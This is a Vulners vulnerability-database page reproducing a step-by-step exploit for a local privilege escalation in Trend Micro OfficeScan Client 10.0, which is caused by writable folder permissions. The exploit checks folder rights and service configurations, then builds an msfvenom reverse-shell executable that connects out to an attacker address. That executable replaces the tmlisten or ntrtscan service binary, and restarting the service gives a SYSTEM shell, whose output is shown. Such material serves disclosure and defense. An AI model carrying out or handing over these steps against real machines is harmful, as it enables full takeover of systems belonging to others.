Vulners
Lucene search
Trend Micro OfficeScan Client 10.0 Local Privilege Escalation
`# Exploit Title: Trend Micro OfficeScan Client 10.0 - ACL Service LPE
# Date: 2023/05/04
# Exploit Author: msd0pe
# Vendor Homepage: https://www.trendmicro.com
# My Github: https://github.com/msd0pe-1
Trend Micro OfficeScan Client:
Versions =< 10.0 contains wrong ACL rights on the OfficeScan client folder which allows attackers to escalate privileges to the system level through the services. This vulnerabily does not need any privileges access.
[1] Verify the folder rights:
> icacls "C:\Program Files (x86)\Trend Micro\OfficeScan Client"
C:\Program Files (x86)\Trend Micro\OfficeScan Client NT SERVICE\TrustedInstaller:(F)
NT SERVICE\TrustedInstaller:(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
BUILTIN\Administrators:(F)
BUILTIN\Administrators:(OI)(CI)(IO)(F)
BUILTIN\Users:(F)
BUILTIN\Users:(OI)(CI)(IO)(F)
CREATOR OWNER:(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)
[2] Get informations about the services:
> sc qc tmlisten
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: tmlisten
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : OfficeScan NT Listener
DEPENDENCIES : Netman
: WinMgmt
SERVICE_START_NAME : LocalSystem
OR
> sc qc ntrtscan
SERVICE_NAME: ntrtscan
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : OfficeScan NT RealTime Scan
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
[3] Generate a reverse shell:
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o tmlisten.exe
OR
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o ntrtscan.exe
[4] Upload the reverse shell to C:\Program Files(x86)\Trend Micro\OfficeScan Client\tmlisten.exe OR C:\Program Files(x86)\Trend Micro\OfficeScan Client\ntrtscan.exe
[5] Start listener
> nc -lvp 4444
[6] Reboot the service/server
> sc stop tmlisten
> sc start tmlisten
OR
> sc stop ntrtscan
> sc start ntrtscan
OR
> shutdown /r
[7] Enjoy !
192.168.1.102: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
Microsoft Windows [Version 10.0.19045.2130]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 May 2023 00:00Current
7.1High risk
Vulners AI Score7.1